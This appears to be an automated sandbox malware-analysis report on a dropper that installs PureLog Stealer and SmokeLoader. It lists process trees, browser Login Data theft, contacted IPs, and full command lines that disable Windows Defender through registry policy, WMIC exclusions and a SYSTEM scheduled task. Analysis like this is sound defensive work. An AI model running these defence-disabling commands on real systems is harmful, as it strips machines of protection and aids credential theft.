Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"

Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1346017941.0000000004880000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E3575270 cpuid

0_2_00007FF7E3575270

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E35D92DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7E35D92DC

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

18_2_00414B04

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry value created: Exclusions_Extensions 1

Modifies Group Policy settings

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Searches for user specific document files

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
85.192.56.26	unknown	Russian Federation	12695	DINET-ASRU	false
87.240.132.78	unknown	Russian Federation	47541	VKONTAKTE-SPB-AShttpvkcomRU	false
104.192.108.17	unknown	United States	55992	QIHOOBeijingQihuTechnologyCompanyLimitedCN	false
172.67.147.32	unknown	United States	13335	CLOUDFLARENETUS	false
199.232.210.172	unknown	United States	54113	FASTLYUS	false
104.20.3.235	unknown	United States	13335	CLOUDFLARENETUS	false
108.156.60.116	unknown	United States	16509	AMAZON-02US	false
99.86.249.120	unknown	United States	16509	AMAZON-02US	false
147.45.47.149	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
20.101.57.9	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.89.179.12	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
176.111.174.109	unknown	Russian Federation	201305	WILWAWPL	false
91.202.233.231	unknown	Russian Federation	9009	M247GB	true
91.202.233.232	unknown	Russian Federation	9009	M247GB	false
104.20.4.235	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.19.24	unknown	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
108.156.60.18	unknown	United States	16509	AMAZON-02US	false
146.70.56.165	unknown	United Kingdom	2018	TENET-1ZA	false
45.129.96.86	unknown	Estonia	208440	GMHOST-EE	true
66.85.156.89	unknown	United States	20454	SSASN2US	true
54.76.174.118	unknown	United States	16509	AMAZON-02US	false
34.117.186.192	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
18.184.178.29	unknown	United States	16509	AMAZON-02US	false
54.77.42.29	unknown	United States	16509	AMAZON-02US	false
104.26.9.59	unknown	United States	13335	CLOUDFLARENETUS	false
185.172.128.159	unknown	Russian Federation	50916	NADYMSS-ASRU	false
37.221.125.202	unknown	Lithuania	62416	PTSERVIDORPT	false
151.236.127.172	unknown	Russian Federation	57363	CDNVIDEO-ASRU	false
151.236.118.173	unknown	Russian Federation	204720	CDNETWORKSRU	false
13.227.219.114	unknown	United States	16509	AMAZON-02US	false
108.156.60.43	unknown	United States	16509	AMAZON-02US	false
